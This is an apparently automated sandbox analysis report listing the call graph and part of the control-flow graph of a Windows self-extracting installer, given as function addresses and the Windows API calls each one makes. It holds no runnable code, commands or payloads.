10b19d5 2570->2572 2572->2423 2572->2435 2574 10b18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 10b1900 GetTokenInformation 2574->2575 2576 10b19aa CloseHandle 2575->2576 2577 10b1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 10b1927 LocalAlloc 2577->2578 2579 10b19a9 2578->2579 2580 10b1938 GetTokenInformation 2578->2580 2579->2576 2581 10b194e AllocateAndInitializeSid 2580->2581 2582 10b19a2 LocalFree 2580->2582 2581->2582 2586 10b196e 2581->2586 2582->2579 2583 10b1999 FreeSid 2583->2582 2584 10b1975 EqualSid 2585 10b198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2590 10b66d5 2587->2590 2588 10b66f3 2588->2518 2590->2588 2591 10b66e5 CharNextA 2590->2591 2599 10b6648 2590->2599 2591->2590 2593 10b659b 2592->2593 2593->2593 2594 
10b65ab 2593->2594 2595 10b65b8 CharPrevA 2593->2595 2594->2520 2595->2594 2602 10b6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10b621d 2600 10b665d IsDBCSLeadByte 2599->2600 2601 10b6668 2599->2601 2600->2601 2601->2590 2602->2598 2604 10b2a62 2603->2604 2611 10b290d 2603->2611 2605 10b2a6e GlobalFree 2604->2605 2606 10b2a75 2604->2606 2605->2606 2606->2559 2608 10b2955 GlobalAlloc 2608->2604 2609 10b2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 10b2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 10b2a80 GlobalUnlock 2611->2612 2613 10b2773 2611->2613 2612->2604 2614 10b27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 10b28b2 2613->2615 2616 10b27db 2614->2616 2617 10b28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 10b28a8 GetWindowsDirectoryA 2616->2618 2620 10b27e3 2616->2620 2619 10b28bf 2617->2619 2618->2619 2621 10b28d2 2619->2621 2622 10b658a CharPrevA 2619->2622 2624 10b658a CharPrevA 2620->2624 2623 10b6ce0 4 API calls 2621->2623 2622->2621 2625 10b28e2 2623->2625 2626 10b2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 10b2837 RegQueryValueExA 2626->2627 2628 10b289a RegCloseKey 2627->2628 2629 10b285c 2627->2629 2628->2619 2630 10b2867 ExpandEnvironmentStringsA 2629->2630 2631 10b287a 2629->2631 2630->2631 2631->2628 2633 10b1890 2632->2633 2634 10b1826 GetProcAddress 2632->2634 2635 10b6ce0 4 API calls 2633->2635 2636 10b1889 FreeLibrary 2634->2636 2637 10b1839 AllocateAndInitializeSid 2634->2637 2638 10b189f 2635->2638 2636->2633 2637->2636 2639 10b185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 10b468f 7 API calls 2641->2642 2643 10b51f9 LocalAlloc 2642->2643 2644 10b522d 2643->2644 2645 10b520d 2643->2645 2647 10b468f 7 API calls 2644->2647 2646 10b44b9 20 API calls 2645->2646 2648 10b521e 2646->2648 2649 10b523a 2647->2649 2650 10b6285 GetLastError 2648->2650 2651 10b523e 2649->2651 2652 10b5262 lstrcmpA 2649->2652 2659 10b2f4d 
2650->2659 2653 10b44b9 20 API calls 2651->2653 2654 10b527e 2652->2654 2655 10b5272 LocalFree 2652->2655 2657 10b524f LocalFree 2653->2657 2656 10b44b9 20 API calls 2654->2656 2655->2659 2658 10b5290 LocalFree 2656->2658 2657->2659 2658->2659 2659->2438 2659->2439 2659->2444 2661 10b468f 7 API calls 2660->2661 2662 10b5175 2661->2662 2663 10b517a 2662->2663 2664 10b51af 2662->2664 2666 10b44b9 20 API calls 2663->2666 2665 10b468f 7 API calls 2664->2665 2667 10b51c0 2665->2667 2668 10b518d 2666->2668 2822 10b6298 2667->2822 2668->2441 2671 10b51e1 2671->2441 2672 10b44b9 20 API calls 2672->2668 2674 10b468f 7 API calls 2673->2674 2675 10b55c7 LocalAlloc 2674->2675 2676 10b55db 2675->2676 2677 10b55fd 2675->2677 2678 10b44b9 20 API calls 2676->2678 2679 10b468f 7 API calls 2677->2679 2680 10b55ec 2678->2680 2681 10b560a 2679->2681 2682 10b6285 GetLastError 2680->2682 2683 10b560e 2681->2683 2684 10b5632 lstrcmpA 2681->2684 2707 10b55f1 2682->2707 2687 10b44b9 20 API calls 2683->2687 2685 10b564b LocalFree 2684->2685 2686 10b5645 2684->2686 2688 10b565b 2685->2688 2689 10b5696 2685->2689 2686->2685 2690 10b561f LocalFree 2687->2690 2695 10b5467 49 API calls 2688->2695 2691 10b589f 2689->2691 2694 10b56ae GetTempPathA 2689->2694 2690->2707 2692 10b6517 24 API calls 2691->2692 2692->2707 2693 10b6ce0 4 API calls 2696 10b2f7e 2693->2696 2697 10b56eb 2694->2697 2698 10b56c3 2694->2698 2699 10b5678 2695->2699 2696->2444 2696->2450 2703 10b586c GetWindowsDirectoryA 2697->2703 2704 10b5717 GetDriveTypeA 2697->2704 2697->2707 2834 10b5467 2698->2834 2702 10b44b9 20 API calls 2699->2702 2699->2707 2702->2707 2868 10b597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2708 10b5730 GetFileAttributesA 2704->2708 2719 10b572b 2704->2719 2707->2693 2708->2719 2710 10b5467 49 API calls 2710->2697 2711 10b2630 21 API calls 2711->2719 2713 10b57c1 GetWindowsDirectoryA 2713->2719 2714 10b658a CharPrevA 2716 10b57e8 GetFileAttributesA 2714->2716 2715 10b597d 34 API calls 
2715->2719 2717 10b57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 10b5827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2708 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 10b5467 49 API calls 2719->2720 2864 10b6952 2719->2864 2720->2719 2722 10b6249 2721->2722 2723 10b6268 2721->2723 2725 10b44b9 20 API calls 2722->2725 2724 10b597d 34 API calls 2723->2724 2726 10b625f 2724->2726 2727 10b625a 2725->2727 2728 10b6ce0 4 API calls 2726->2728 2729 10b6285 GetLastError 2727->2729 2730 10b3013 2728->2730 2729->2726 2730->2444 2730->2457 2732 10b3b2d 2731->2732 2732->2732 2733 10b3b72 2732->2733 2734 10b3b53 2732->2734 2934 10b4fe0 2733->2934 2736 10b6517 24 API calls 2734->2736 2737 10b3b70 2736->2737 2738 10b6298 10 API calls 2737->2738 2739 10b3b7b 2737->2739 2738->2739 2739->2463 2741 10b2583 2740->2741 2742 10b2622 2740->2742 2744 10b258b 2741->2744 2745 10b25e8 RegOpenKeyExA 2741->2745 2961 10b24e0 GetWindowsDirectoryA 2742->2961 2747 10b25e3 2744->2747 2749 10b259b RegOpenKeyExA 2744->2749 2746 10b2609 RegQueryInfoKeyA 2745->2746 2745->2747 2748 10b25d1 RegCloseKey 2746->2748 2747->2465 2748->2747 2749->2747 2750 10b25bc RegQueryValueExA 2749->2750 2750->2748 2752 10b3bdb 2751->2752 2755 10b3bec 2751->2755 2753 10b468f 7 API calls 2752->2753 2753->2755 2754 10b3c03 memset 2754->2755 2755->2754 2756 10b3d13 2755->2756 2759 10b3d26 2755->2759 2762 10b3d7b CompareStringA 2755->2762 2763 10b3fd7 2755->2763 2765 10b3fab 2755->2765 2768 10b3f1e LocalFree 2755->2768 2769 10b3f46 LocalFree 2755->2769 2772 10b468f 7 API calls 2755->2772 2774 10b3cc7 CompareStringA 2755->2774 2785 10b3e10 2755->2785 2969 10b1ae8 2755->2969 3010 10b202a memset memset RegCreateKeyExA 2755->3010 3036 10b3fef 2755->3036 2757 10b44b9 20 API calls 2756->2757 2757->2759 2760 10b6ce0 4 API calls 2759->2760 2761 10b3f60 2760->2761 2761->2471 2762->2755 2762->2763 2763->2759 3060 10b2267 2763->3060 2767 10b44b9 20 API calls 2765->2767 2771 10b3fbe 
LocalFree 2767->2771 2768->2755 2768->2763 2769->2759 2771->2759 2772->2755 2774->2755 2775 10b3e1f GetProcAddress 2778 10b3f64 2775->2778 2775->2785 2776 10b3f92 2777 10b44b9 20 API calls 2776->2777 2779 10b3fa9 2777->2779 2780 10b44b9 20 API calls 2778->2780 2781 10b3f7c LocalFree 2779->2781 2782 10b3f75 FreeLibrary 2780->2782 2783 10b6285 GetLastError 2781->2783 2782->2781 2784 10b3f8b 2783->2784 2784->2759 2785->2775 2785->2776 2786 10b3eff FreeLibrary 2785->2786 2787 10b3f40 FreeLibrary 2785->2787 3050 10b6495 2785->3050 2786->2768 2787->2769 2789 10b468f 7 API calls 2788->2789 2790 10b3a55 LocalAlloc 2789->2790 2791 10b3a8e 2790->2791 2792 10b3a6c 2790->2792 2794 10b468f 7 API calls 2791->2794 2793 10b44b9 20 API calls 2792->2793 2795 10b3a7d 2793->2795 2796 10b3a98 2794->2796 2797 10b6285 GetLastError 2795->2797 2798 10b3a9c 2796->2798 2799 10b3ac5 lstrcmpA 2796->2799 2805 10b2f64 2797->2805 2800 10b44b9 20 API calls 2798->2800 2801 10b3ada 2799->2801 2802 10b3b0d LocalFree 2799->2802 2803 10b3aad LocalFree 2800->2803 2804 10b6517 24 API calls 2801->2804 2802->2805 2803->2805 2806 10b3aec LocalFree 2804->2806 2805->2438 2805->2444 2806->2805 2808 10b628f 2807->2808 2808->2444 2810 10b468f 7 API calls 2809->2810 2811 10b417d LocalAlloc 2810->2811 2812 10b41a8 2811->2812 2813 10b4195 2811->2813 2814 10b468f 7 API calls 2812->2814 2815 10b44b9 20 API calls 2813->2815 2816 10b41b5 2814->2816 2817 10b41a6 2815->2817 2818 10b41c5 lstrcmpA 2816->2818 2820 10b41b9 2816->2820 2817->2444 2819 10b41e6 LocalFree 2818->2819 2818->2820 2819->2817 2821 10b44b9 20 API calls 2820->2821 2821->2819 2823 10b171e _vsnprintf 2822->2823 2833 10b62c9 FindResourceA 2823->2833 2825 10b62cb LoadResource LockResource 2826 10b6353 2825->2826 2829 10b62e0 2825->2829 2827 10b6ce0 4 API calls 2826->2827 2828 10b51ca 2827->2828 2828->2671 2828->2672 2830 10b631b FreeResource 2829->2830 2831 10b6355 FreeResource 2829->2831 2832 10b171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 
2833->2826 2835 10b548a 2834->2835 2853 10b551a 2834->2853 2894 10b53a1 2835->2894 2837 10b5581 2841 10b6ce0 4 API calls 2837->2841 2840 10b5495 2840->2837 2844 10b550c 2840->2844 2845 10b54c2 GetSystemInfo 2840->2845 2846 10b559a 2841->2846 2842 10b553b CreateDirectoryA 2847 10b5577 2842->2847 2848 10b5547 2842->2848 2843 10b554d 2843->2837 2849 10b597d 34 API calls 2843->2849 2850 10b658a CharPrevA 2844->2850 2856 10b54da 2845->2856 2846->2707 2858 10b2630 GetWindowsDirectoryA 2846->2858 2851 10b6285 GetLastError 2847->2851 2848->2843 2852 10b555c 2849->2852 2850->2853 2854 10b557c 2851->2854 2852->2837 2857 10b5568 RemoveDirectoryA 2852->2857 2905 10b58c8 2853->2905 2854->2837 2855 10b658a CharPrevA 2855->2844 2856->2844 2856->2855 2857->2837 2859 10b266f 2858->2859 2860 10b265e 2858->2860 2862 10b6ce0 4 API calls 2859->2862 2861 10b44b9 20 API calls 2860->2861 2861->2859 2863 10b2687 2862->2863 2863->2697 2863->2710 2865 10b696e GetDiskFreeSpaceA 2864->2865 2866 10b69a1 2864->2866 2865->2866 2867 10b6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 10b59bb 2868->2869 2870 10b59dd GetDiskFreeSpaceA 2868->2870 2873 10b44b9 20 API calls 2869->2873 2871 10b5ba1 memset 2870->2871 2872 10b5a21 MulDiv 2870->2872 2874 10b6285 GetLastError 2871->2874 2872->2871 2875 10b5a50 GetVolumeInformationA 2872->2875 2876 10b59cc 2873->2876 2878 10b5bbc GetLastError FormatMessageA 2874->2878 2879 10b5a6e memset 2875->2879 2880 10b5ab5 SetCurrentDirectoryA 2875->2880 2877 10b6285 GetLastError 2876->2877 2881 10b59d1 2877->2881 2882 10b5be3 2878->2882 2883 10b6285 GetLastError 2879->2883 2889 10b5acc 2880->2889 2887 10b6ce0 4 API calls 2881->2887 2884 10b44b9 20 API calls 2882->2884 2885 10b5a89 GetLastError FormatMessageA 2883->2885 2886 10b5bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2888 10b5c11 2887->2888 2888->2697 2890 10b5b0a 2889->2890 2892 10b5b20 2889->2892 2891 10b44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 10b268b 2892->2917 2896 10b53bf 
2894->2896 2895 10b171e _vsnprintf 2895->2896 2896->2895 2897 10b658a CharPrevA 2896->2897 2900 10b5415 GetTempFileNameA 2896->2900 2898 10b53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 10b544f CreateDirectoryA 2898->2899 2899->2900 2901 10b543a 2899->2901 2900->2901 2902 10b5429 DeleteFileA CreateDirectoryA 2900->2902 2903 10b6ce0 4 API calls 2901->2903 2902->2901 2904 10b5449 2903->2904 2904->2840 2906 10b58d8 2905->2906 2906->2906 2907 10b58df LocalAlloc 2906->2907 2908 10b58f3 2907->2908 2910 10b5919 2907->2910 2909 10b44b9 20 API calls 2908->2909 2911 10b5906 2909->2911 2912 10b658a CharPrevA 2910->2912 2913 10b6285 GetLastError 2911->2913 2915 10b5534 2911->2915 2914 10b5931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 10b595b CloseHandle GetFileAttributesA 2914->2916 2915->2842 2915->2843 2916->2911 2918 10b26b9 2917->2918 2919 10b26e5 2917->2919 2920 10b171e _vsnprintf 2918->2920 2921 10b26ea 2919->2921 2922 10b271f 2919->2922 2924 10b26cc 2920->2924 2925 10b171e _vsnprintf 2921->2925 2923 10b26e3 2922->2923 2926 10b171e _vsnprintf 2922->2926 2927 10b6ce0 4 API calls 2923->2927 2928 10b44b9 20 API calls 2924->2928 2929 10b26fd 2925->2929 2930 10b2735 2926->2930 2931 10b276d 2927->2931 2928->2923 2932 10b44b9 20 API calls 2929->2932 2933 10b44b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 10b468f 7 API calls 2934->2935 2936 10b4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 10b5020 2936->2937 2949 10b515f 2936->2949 2938 10b5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 10b5057 2937->2939 2938->2939 2953 10b4efd 2939->2953 2942 10b507c 2945 10b5075 2942->2945 2947 10b44b9 20 API calls 2942->2947 2943 10b5060 2944 10b44b9 20 API calls 2943->2944 2944->2945 2946 10b5110 FreeResource 2945->2946 2948 10b511d 2945->2948 2946->2948 2947->2945 2950 10b513a 2948->2950 2951 10b44b9 20 API calls 2948->2951 2949->2737 2950->2949 2952 10b514c SendMessageA 2950->2952 2951->2950 
2952->2949 2954 10b4f4a 2953->2954 2955 10b4980 25 API calls 2954->2955 2960 10b4fa1 2954->2960 2958 10b4f67 2955->2958 2956 10b6ce0 4 API calls 2957 10b4fc6 2956->2957 2957->2942 2957->2943 2959 10b4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 10b255b 2961->2962 2963 10b2510 2961->2963 2964 10b6ce0 4 API calls 2962->2964 2965 10b658a CharPrevA 2963->2965 2966 10b2569 2964->2966 2967 10b2522 WritePrivateProfileStringA _lopen 2965->2967 2966->2747 2967->2962 2968 10b2548 _llseek _lclose 2967->2968 2968->2962 2970 10b1b25 2969->2970 3074 10b1a84 2970->3074 2972 10b1b57 2973 10b658a CharPrevA 2972->2973 2974 10b1b8c 2972->2974 2973->2974 2975 10b66c8 2 API calls 2974->2975 2976 10b1bd1 2975->2976 2977 10b1bd9 CompareStringA 2976->2977 2978 10b1d73 2976->2978 2977->2978 2980 10b1bf7 GetFileAttributesA 2977->2980 2979 10b66c8 2 API calls 2978->2979 2983 10b1d7d 2979->2983 2981 10b1c0d 2980->2981 2982 10b1d53 2980->2982 2981->2982 2987 10b1a84 2 API calls 2981->2987 2986 10b1d64 2982->2986 2984 10b1df8 LocalAlloc 2983->2984 2985 10b1d81 CompareStringA 2983->2985 2984->2986 2989 10b1e0b GetFileAttributesA 2984->2989 2985->2984 2988 10b1d9b LocalAlloc 2985->2988 2990 10b44b9 20 API calls 2986->2990 2993 10b1c31 2987->2993 2988->2986 3001 10b1de1 2988->3001 2992 10b1e1d 2989->2992 3007 10b1e45 2989->3007 3003 10b1d6c 2990->3003 2991 10b1c50 LocalAlloc 2991->2986 2994 10b1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2991->2994 2992->3007 2993->2991 2996 10b1a84 2 API calls 2993->2996 3002 10b1cf8 2994->3002 3008 10b1cc2 2994->3008 2995 10b6ce0 4 API calls 3000 10b1ea1 2995->3000 2996->2991 3000->2755 3006 10b171e _vsnprintf 3001->3006 3004 10b1d09 GetShortPathNameA 3002->3004 3005 10b1d23 3002->3005 3003->2995 3004->3005 3009 10b171e _vsnprintf 3005->3009 3006->3008 3080 10b2aac 3007->3080 3008->3003 3009->3008 3011 10b209a 3010->3011 3012 10b2256 3010->3012 3014 10b171e _vsnprintf 3011->3014 3017 10b20dc 3011->3017 3013 10b6ce0 4 
API calls 3012->3013 3015 10b2263 3013->3015 3016 10b20af RegQueryValueExA 3014->3016 3015->2755 3016->3011 3016->3017 3018 10b20fb GetSystemDirectoryA 3017->3018 3019 10b20e4 RegCloseKey 3017->3019 3020 10b658a CharPrevA 3018->3020 3019->3012 3021 10b211b LoadLibraryA 3020->3021 3022 10b2179 GetModuleFileNameA 3021->3022 3023 10b212e GetProcAddress FreeLibrary 3021->3023 3024 10b21de RegCloseKey 3022->3024 3028 10b2177 3022->3028 3023->3022 3025 10b214e GetSystemDirectoryA 3023->3025 3024->3012 3026 10b2165 3025->3026 3025->3028 3027 10b658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 10b21b7 LocalAlloc 3028->3029 3030 10b21cd 3029->3030 3031 10b21ec 3029->3031 3032 10b44b9 20 API calls 3030->3032 3033 10b171e _vsnprintf 3031->3033 3032->3024 3034 10b2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 10b4016 CreateProcessA 3036->3037 3048 10b4106 3036->3048 3038 10b4041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 10b40c4 3037->3039 3045 10b4070 3038->3045 3042 10b6285 GetLastError 3039->3042 3040 10b6ce0 4 API calls 3041 10b4117 3040->3041 3041->2755 3044 10b40c9 GetLastError FormatMessageA 3042->3044 3047 10b44b9 20 API calls 3044->3047 3107 10b411b 3045->3107 3046 10b4096 CloseHandle CloseHandle 3046->3048 3049 10b40ba 3046->3049 3047->3048 3048->3040 3049->3048 3051 10b64c2 3050->3051 3052 10b658a CharPrevA 3051->3052 3053 10b64d8 GetFileAttributesA 3052->3053 3054 10b64ea 3053->3054 3055 10b6501 LoadLibraryA 3053->3055 3054->3055 3056 10b64ee LoadLibraryExA 3054->3056 3057 10b6508 3055->3057 3056->3057 3058 10b6ce0 4 API calls 3057->3058 3059 10b6513 3058->3059 3059->2785 3061 10b2289 RegOpenKeyExA 3060->3061 3062 10b2381 3060->3062 3061->3062 3064 10b22b1 RegQueryValueExA 3061->3064 3063 10b6ce0 4 API calls 3062->3063 3065 10b238c 3063->3065 3066 10b22e6 memset GetSystemDirectoryA 3064->3066 3067 10b2374 RegCloseKey 3064->3067 3065->2759 3068 10b230f 3066->3068 3069 10b2321 3066->3069 3067->3062 3070 10b658a CharPrevA 
3068->3070 3071 10b171e _vsnprintf 3069->3071 3070->3069 3072 10b233f RegSetValueExA 3071->3072 3072->3067 3075 10b1a9a 3074->3075 3077 10b1aba 3075->3077 3079 10b1aaf 3075->3079 3093 10b667f 3075->3093 3077->2972 3078 10b667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 10b2be6 3080->3081 3082 10b2ad4 GetModuleFileNameA 3080->3082 3083 10b6ce0 4 API calls 3081->3083 3089 10b2b02 3082->3089 3085 10b2bf5 3083->3085 3084 10b2af1 IsDBCSLeadByte 3084->3089 3085->3003 3086 10b2bca CharNextA 3088 10b2bd3 CharNextA 3086->3088 3087 10b2b11 CharNextA CharUpperA 3087->3089 3090 10b2b8d CharUpperA 3087->3090 3088->3089 3089->3081 3089->3084 3089->3086 3089->3087 3089->3088 3092 10b2b43 CharPrevA 3089->3092 3098 10b65e8 3089->3098 3090->3089 3092->3089 3096 10b6689 3093->3096 3094 10b66a5 3094->3075 3095 10b6648 IsDBCSLeadByte 3095->3096 3096->3094 3096->3095 3097 10b6697 CharNextA 3096->3097 3097->3096 3099 10b65f4 3098->3099 3099->3099 3100 10b65fb CharPrevA 3099->3100 3101 10b6611 CharPrevA 3100->3101 3102 10b660b 3101->3102 3103 10b661e 3101->3103 3102->3101 3102->3103 3104 10b663d 3103->3104 3105 10b6627 CharPrevA 3103->3105 3106 10b6634 CharNextA 3103->3106 3104->3089 3105->3104 3105->3106 3106->3104 3108 10b4132 3107->3108 3110 10b412a 3107->3110 3111 10b1ea7 3108->3111 3110->3046 3112 10b1eba 3111->3112 3113 10b1ed3 3111->3113 3114 10b256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 10b1ff0 RegOpenKeyExA 3115->3116 3117 10b2026 3115->3117 3116->3117 3118 10b200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3228 10b6a20 __getmainargs 3229 10b19e0 3230 10b1a03 3229->3230 3231 10b1a24 GetDesktopWindow 3229->3231 3232 10b1a20 3230->3232 3234 10b1a16 EndDialog 3230->3234 3233 10b43d0 11 API calls 3231->3233 3236 10b6ce0 4 API calls 3232->3236 3235 10b1a33 LoadStringA SetDlgItemTextA MessageBeep 3233->3235 3234->3232 3235->3232 3237 10b1a7e 3236->3237 3238 10b7270 _except_handler4_common 3239 10b69b0 3240 10b69b5 3239->3240 3248 10b6fbe 
GetModuleHandleW 3240->3248 3242 10b69c1 __set_app_type __p__fmode __p__commode 3243 10b69f9 3242->3243 3244 10b6a0e 3243->3244 3245 10b6a02 __setusermatherr 3243->3245 3250 10b71ef _controlfp 3244->3250 3245->3244 3247 10b6a13 3249 10b6fcf 3248->3249 3249->3242 3250->3247 3251 10b34f0 3252 10b3504 3251->3252 3253 10b35b8 3251->3253 3252->3253 3254 10b351b 3252->3254 3255 10b35be GetDesktopWindow 3252->3255 3256 10b3526 3253->3256 3260 10b3671 EndDialog 3253->3260 3258 10b354f 3254->3258 3259 10b351f 3254->3259 3257 10b43d0 11 API calls 3255->3257 3261 10b35d6 3257->3261 3258->3256 3263 10b3559 ResetEvent 3258->3263 3259->3256 3262 10b352d TerminateThread EndDialog 3259->3262 3260->3256 3264 10b361d SetWindowTextA CreateThread 3261->3264 3265 10b35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3262->3256 3266 10b44b9 20 API calls 3263->3266 3264->3256 3267 10b3646 3264->3267 3265->3264 3268 10b3581 3266->3268 3269 10b44b9 20 API calls 3267->3269 3270 10b359b SetEvent 3268->3270 3272 10b358a SetEvent 3268->3272 3269->3253 3271 10b3680 4 API calls 3270->3271 3271->3253 3272->3256 3273 10b6ef0 3274 10b6f2d 3273->3274 3275 10b6f02 3273->3275 3275->3274 3276 10b6f27 ?terminate@ 3275->3276 3276->3274

Callgraph

(Rows of the form "N Function_ADDR" declare callgraph node N for the function at ADDR; "A->B" is a call edge from node A to node B. The executed / not-executed shading, opacity-by-relevance and per-node disassembly links of the interactive report are not reproduced in this text form.)
                                                                                                                                                                                                                                    callgraph 0 Function_010B7208 1 Function_010B490C 2 Function_010B6C03 27 Function_010B724D 2->27 3 Function_010B4702 56 Function_010B1680 3->56 82 Function_010B16B3 3->82 4 Function_010B7000 5 Function_010B4200 6 Function_010B3100 95 Function_010B43D0 6->95 7 Function_010B411B 78 Function_010B1EA7 7->78 8 Function_010B681F 108 Function_010B6CE0 8->108 114 Function_010B66F9 8->114 9 Function_010B171E 10 Function_010B621E 46 Function_010B597D 10->46 59 Function_010B6285 10->59 80 Function_010B44B9 10->80 10->108 11 Function_010B2F1D 11->10 20 Function_010B3B26 11->20 22 Function_010B3A3F 11->22 34 Function_010B4169 11->34 35 Function_010B256D 11->35 43 Function_010B5164 11->43 51 Function_010B658A 11->51 11->59 72 Function_010B3BA2 11->72 77 Function_010B55A0 11->77 11->80 11->108 112 Function_010B51E5 11->112 12 Function_010B3210 21 Function_010B4224 12->21 12->46 12->51 12->80 86 Function_010B58C8 12->86 12->95 13 Function_010B7010 14 Function_010B5C17 15 Function_010B6517 15->80 16 Function_010B6E2A 117 Function_010B6CF0 16->117 17 Function_010B202A 17->9 17->51 17->80 17->108 18 Function_010B7120 19 Function_010B6A20 20->15 62 Function_010B6298 20->62 106 Function_010B4FE0 20->106 21->56 21->80 22->15 53 Function_010B468F 22->53 22->59 22->80 23 Function_010B6C3F 24 Function_010B2630 24->80 24->108 25 Function_010B4C37 26 Function_010B6648 28 Function_010B6F40 29 Function_010B6952 30 Function_010B4A50 31 Function_010B3450 31->95 32 Function_010B7155 33 Function_010B6F54 33->0 33->27 34->53 34->80 107 Function_010B24E0 35->107 36 Function_010B476D 36->15 69 Function_010B66AE 36->69 37 Function_010B4B60 38 Function_010B6A60 38->0 38->23 38->27 38->32 39 Function_010B7060 38->39 113 Function_010B2BFB 38->113 39->13 39->18 40 Function_010B6760 
41 Function_010B5467 41->46 41->51 54 Function_010B1781 41->54 41->56 41->59 74 Function_010B53A1 41->74 41->86 41->108 42 Function_010B2267 42->9 42->51 42->108 43->53 43->62 43->80 44 Function_010B487A 44->1 45 Function_010B667F 45->26 50 Function_010B268B 46->50 46->59 46->80 46->108 47 Function_010B2773 47->51 47->54 47->56 47->108 48 Function_010B7270 49 Function_010B6C70 50->9 50->80 50->108 51->82 52 Function_010B2A89 55 Function_010B4980 55->44 55->80 56->54 57 Function_010B3680 58 Function_010B6380 60 Function_010B1A84 60->45 61 Function_010B4E99 61->56 62->9 62->108 63 Function_010B5C9E 63->14 63->16 63->45 63->51 63->56 63->80 87 Function_010B66C8 63->87 63->108 109 Function_010B31E0 63->109 64 Function_010B6793 65 Function_010B2390 65->51 65->56 65->65 65->82 65->108 66 Function_010B1F90 66->78 66->80 66->108 67 Function_010B6495 67->51 67->54 67->108 68 Function_010B2CAA 68->15 68->53 68->63 68->65 71 Function_010B18A3 68->71 68->80 103 Function_010B36EE 68->103 68->108 70 Function_010B2AAC 70->56 88 Function_010B17C8 70->88 99 Function_010B65E8 70->99 70->108 104 Function_010B17EE 71->104 71->108 72->17 72->42 72->53 72->54 72->59 72->67 72->80 97 Function_010B1AE8 72->97 100 Function_010B3FEF 72->100 72->108 73 Function_010B72A2 74->9 74->51 74->56 74->108 75 Function_010B6FA1 76 Function_010B4CA0 77->15 77->24 77->29 77->41 77->46 77->51 77->53 77->54 77->59 77->80 77->108 78->35 79 Function_010B6FA5 79->27 80->8 80->9 80->56 85 Function_010B67C9 80->85 80->108 81 Function_010B6FBE 81->33 82->54 83 Function_010B69B0 83->4 83->49 83->81 101 Function_010B71EF 83->101 84 Function_010B52B6 84->54 84->65 84->99 105 Function_010B1FE1 84->105 84->108 85->64 86->51 86->56 86->59 86->80 87->26 89 Function_010B4CC0 90 Function_010B4BC0 91 Function_010B30C0 92 Function_010B63C0 92->51 92->54 92->108 93 Function_010B4AD0 93->57 94 Function_010B4CD0 94->3 94->25 94->36 94->37 94->55 94->61 94->108 110 Function_010B47E0 94->110 95->108 96 Function_010B70EB 97->9 
97->51 97->54 97->56 97->60 97->70 97->80 97->82 97->87 97->108 98 Function_010B28E8 98->47 98->52 100->7 100->59 100->80 100->108 102 Function_010B6BEF 103->8 103->52 103->80 103->85 103->98 103->108 104->108 106->53 106->80 116 Function_010B4EFD 106->116 107->51 107->108 108->117 110->56 110->80 111 Function_010B19E0 111->95 111->108 112->53 112->59 112->80 113->11 113->66 113->68 113->84 115 Function_010B70FE 116->37 116->55 116->108 118 Function_010B34F0 118->57 118->80 118->95 119 Function_010B6EF0

Control-flow Graph

(Rows of the form "N start-end [call ... / API ...]" declare basic block N of E010B3BA2 with its address range and the functions or APIs it calls; "A->B" is a control-flow edge from block A to block B. The executed / not-executed shading of the interactive report is not reproduced in this text form.)
                                                                                                                                                                                                                                    control_flow_graph 36 10b3ba2-10b3bd9 37 10b3bdb-10b3bee call 10b468f 36->37 38 10b3bfd-10b3bff 36->38 44 10b3d13-10b3d30 call 10b44b9 37->44 45 10b3bf4-10b3bf7 37->45 40 10b3c03-10b3c28 memset 38->40 42 10b3c2e-10b3c40 call 10b468f 40->42 43 10b3d35-10b3d48 call 10b1781 40->43 42->44 54 10b3c46-10b3c49 42->54 49 10b3d4d-10b3d52 43->49 55 10b3f4d 44->55 45->38 45->44 52 10b3d9e-10b3db6 call 10b1ae8 49->52 53 10b3d54-10b3d6c call 10b468f 49->53 52->55 66 10b3dbc-10b3dc2 52->66 53->44 68 10b3d6e-10b3d75 53->68 54->44 57 10b3c4f-10b3c56 54->57 60 10b3f4f-10b3f63 call 10b6ce0 55->60 62 10b3c58-10b3c5e 57->62 63 10b3c60-10b3c65 57->63 69 10b3c6e-10b3c73 62->69 64 10b3c67-10b3c6d 63->64 65 10b3c75-10b3c7c 63->65 64->69 72 10b3c87-10b3c89 65->72 73 10b3c7e-10b3c82 65->73 70 10b3de6-10b3de8 66->70 71 10b3dc4-10b3dce 66->71 75 10b3d7b-10b3d98 CompareStringA 68->75 76 10b3fda-10b3fe1 68->76 69->72 79 10b3f0b-10b3f15 call 10b3fef 70->79 80 10b3dee-10b3df5 70->80 71->70 77 10b3dd0-10b3dd7 71->77 72->49 78 10b3c8f-10b3c98 72->78 73->72 75->52 75->76 81 10b3fe8-10b3fea 76->81 82 